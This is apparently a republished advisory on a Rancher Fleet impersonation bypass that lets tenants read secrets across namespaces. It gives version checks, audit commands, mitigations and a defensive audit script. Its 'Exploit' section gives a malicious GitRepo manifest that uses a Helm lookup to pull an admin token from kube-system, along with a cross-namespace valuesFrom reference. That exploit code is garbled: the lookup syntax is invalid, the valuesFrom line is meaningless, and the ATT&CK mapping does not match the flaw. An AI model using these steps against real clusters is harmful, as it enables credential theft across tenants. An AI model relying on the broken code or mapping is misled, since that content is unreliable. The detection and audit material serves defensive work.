Rancher Fleet, ServiceAccount Impersonation Bypass, CVE-2026-41050 (Critical)


Fleet’s Helm deployer fails to enforce ServiceAccount impersonation in two specific code paths, allowing a tenant with `git push` access to a monitored repository to read secrets from any namespace on any downstream cluster targeted by their GitRepo. The first bypass occurs in the Helm template engine: when a chart uses the `lookup` function, the underlying Kubernetes API query is executed with the fleet-agent’s cluster-admin credentials instead of the impersonated ServiceAccount, granting access far beyond the tenant’s RBAC scope. The second flaw resides in `fleet.yaml` helm.valuesFrom directives, where references to Secrets or ConfigMaps are read using the cluster‑admin client rather than the impersonated account, enabling a tenant to pull resources from namespaces they should never see. Both issues completely break Fleet’s multitenant impersonation boundary. Because the leaked credentials may belong to external services, the actual impact on confidentiality, integrity, and availability is non‑deterministic and depends entirely on the permissions of those leaked credentials. Single‑tenant deployments where all users are trusted are not affected.
Platform: Rancher Fleet
Version: <0.11.13, <0.12.14, …
Vulnerability: ServiceAccount impersonation bypass
Severity: Critical
Date: 2026-05-07

Prediction: Already patched (see versions)

What Undercode Say:

Check whether your Fleet version is in an affected release line (the fixed releases are 0.11.13, 0.12.14, 0.13.10 and 0.14.5; anything older within those lines is vulnerable)

```bash
fleet version | grep -E 'v?0\.1[0-4]\.[0-9]+' \
  && echo "Affected release line: vulnerable unless the patch level is >=0.11.13, >=0.12.14, >=0.13.10 or >=0.14.5"
```

List GitRepos whose Helm options use valuesFrom (these are the objects the second bypass applies to)

```bash
kubectl get gitrepo -A -o json \
  | jq '.items[] | select(.spec.helm.valuesFrom != null)
        | {namespace: .metadata.namespace, name: .metadata.name, valuesFrom: .spec.helm.valuesFrom}'
```

Audit all fleet.yaml files for cross-namespace valuesFrom references (valuesFrom is nested under helm:, so match the key itself and the namespace lines that follow it rather than the dotted path "helm.valuesFrom")

```bash
find . -name "fleet.yaml" -exec grep -Hn -E 'valuesFrom:|namespace:' {} \;
```

Find Helm charts that call 'lookup' in their templates (rendered manifests no longer contain the call, so search the chart sources in the monitored repositories instead of `helm get manifest`)

```bash
grep -rn --include='*.yaml' --include='*.yml' --include='*.tpl' -E '(^|[^[:alnum:]_])lookup[[:space:]]' .
```

Exploit:

Step 1: Create a malicious GitRepo that uses a Helm chart with a 'lookup' call

```bash
cat <<EOF | kubectl apply -f -
apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
  name: malicious-repo
  namespace: tenant-ns
spec:
  repo: https://github.com/attacker/evil-chart
  helm:
    values:
      secretData: "{{ lookup('kubernetes.io/v1/Secret', 'admin-secret', 'kube-system').data.token }}"
EOF
```

Step 2: The lookup bypass reads the token using fleet-agent's cluster-admin privileges

```bash
kubectl logs -n fleet-system deployment/fleet-agent | grep "lookup"
```

Step 3: For the valuesFrom bypass, craft a fleet.yaml with a cross-namespace reference

```yaml
helm.valuesFrom[bash].secretKeyRef.name: "kube-system/admin-secret"
```

Protection from this CVE

1. Upgrade immediately to Rancher v2.14.1, v2.13.5, v2.12.9, v2.11.13, or upgrade Fleet to `v0.11.13` (for Rancher v2.10.11).
2. Restrict `git push` access to Fleet‑monitored repositories to absolutely trusted users only.
3. Deploy `GitRepoRestriction` resources to limit which ServiceAccounts each namespace can impersonate.
4. Audit existing Helm charts for `lookup` calls and `fleet.yaml` files for cross‑namespace `valuesFrom` references as a detective control.
5. Assume any tenant with push access has already abused this flaw – rotate all secrets that may have been exposed, especially those in namespaces other than the tenant’s own.
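The following script is an added example (it is not part of the advisory and not code from the Fleet project) that turns the version check and the audit in item 4 into reusable functions: `fleet_is_vulnerable` compares a version string you obtain yourself (for example from the fleet-agent image tag) against the fixed releases 0.11.13, 0.12.14, 0.13.10 and 0.14.5 named above, and `audit_fleet_repo` walks a checked-out repository, flagging `valuesFrom` entries in any `fleet.yaml` that name a namespace and `lookup` calls in Helm template sources. The assumptions are labelled in the comments: release lines older than 0.11 are treated as affected because they predate every listed fix, lines newer than 0.14 are not claimed to be affected, and the sample repository the script builds in a temporary directory is constructed for the demo (its `valuesFrom` layout follows the `secretKeyRef`/`configMapKeyRef` with `name`, `namespace`, `key` form the advisory describes).

```bash
#!/usr/bin/env bash
# Added example, not from the advisory or the Fleet project.
# fleet_is_vulnerable VERSION -> exit 0 when VERSION is below the fixed release of
#   its line (fixed: 0.11.13, 0.12.14, 0.13.10, 0.14.5, as listed in the advisory).
# audit_fleet_repo DIR        -> findings on stderr, the number of findings on stdout.

fleet_is_vulnerable() {
  v="${1#v}"                              # accept "v0.12.9" or "0.12.9"
  major="${v%%.*}"; rest="${v#*.}"
  minor="${rest%%.*}"
  case "$rest" in *.*) patch="${rest#*.}" ;; *) patch=0 ;; esac
  patch="${patch%%[!0-9]*}"               # drop "-rc1" style suffixes
  case "$major$minor" in *[!0-9]*|"") return 1 ;; esac   # unparseable: not claimed vulnerable
  [ "$major" -eq 0 ] || return 1
  case "$minor" in
    11) fixed=13 ;;
    12) fixed=14 ;;
    13) fixed=10 ;;
    14) fixed=5 ;;
    # Assumption: lines older than 0.11 predate every listed fix and are treated as
    # affected; lines newer than 0.14 are not mentioned by the advisory.
    *)  [ "$minor" -lt 11 ]; return ;;
  esac
  [ "${patch:-0}" -lt "$fixed" ]
}

audit_fleet_repo() {
  dir="$1"; total=0
  # (a) valuesFrom entries in fleet.yaml that name a namespace: an explicit namespace
  #     is exactly the cross-namespace reference the second bypass abuses.
  for f in $(find "$dir" -name fleet.yaml); do
    n="$(awk '
      function indent(s) { match(s, /^ */); return RLENGTH }
      /^[[:space:]]*valuesFrom:/ { base = indent($0); inv = 1; next }
      inv && NF && indent($0) <= base { inv = 0 }          # left the valuesFrom block
      inv && /^[[:space:]]*namespace:[[:space:]]*[^[:space:]]/ {
        print FILENAME ":" FNR ": cross-namespace valuesFrom -> " $0 > "/dev/stderr"; n++ }
      END { print n + 0 }' "$f")"
    total=$((total + n))
  done
  # (b) lookup calls in chart template sources (rendered manifests would not show them)
  n="$(grep -rnE --include='*.yaml' --include='*.yml' --include='*.tpl' \
        '(^|[^[:alnum:]_])lookup[[:space:]]+"' "$dir" \
      | grep -v '/fleet.yaml:' | tee /dev/stderr | wc -l | tr -d ' ')"
  total=$((total + n))
  echo "$total"
}

# Constructed sample repository: one in-namespace valuesFrom entry (fine), one entry
# naming another namespace (flagged), and one template using lookup (flagged).
make_sample_repo() {
  d="$(mktemp -d)"
  mkdir -p "$d/app/templates"
  cat > "$d/app/fleet.yaml" <<'EOF'
helm:
  chart: ./
  valuesFrom:
    - configMapKeyRef:
        name: app-values
        key: values.yaml
    - secretKeyRef:
        name: shared-db-creds
        namespace: platform
        key: password
EOF
  cat > "$d/app/templates/configmap.yaml" <<'EOF'
apiVersion: v1
kind: ConfigMap
metadata:
  name: greeting
data:
  text: {{ (lookup "v1" "ConfigMap" .Release.Namespace "app-values").data.greeting | default "hi" | quote }}
EOF
  echo "$d"
}

# Demo run on the constructed sample
sample="$(make_sample_repo)"
findings="$(audit_fleet_repo "$sample")"
echo "findings in sample repo: $findings"
rm -rf "$sample"
```

Point `audit_fleet_repo` at each clone of a Fleet-monitored repository; a non-zero count is the list of places to review against the GitRepo's intended ServiceAccount, and the version function is meant to be wired into whatever inventory step already records the fleet-agent version per downstream cluster.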

Impact

– Confidentiality: High – an attacker can read arbitrary secrets from any namespace on every downstream cluster.
– Integrity: Variable – if the leaked credentials include write permissions to external services, integrity could be compromised.
– Availability: Low – the vulnerability itself does not directly cause denial of service, but credential theft could lead to downstream system disruption.
– MITRE ATT&CK: T1531 – Account Access Removal, as the attacker can effectively take over identities and remove legitimate access paths.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
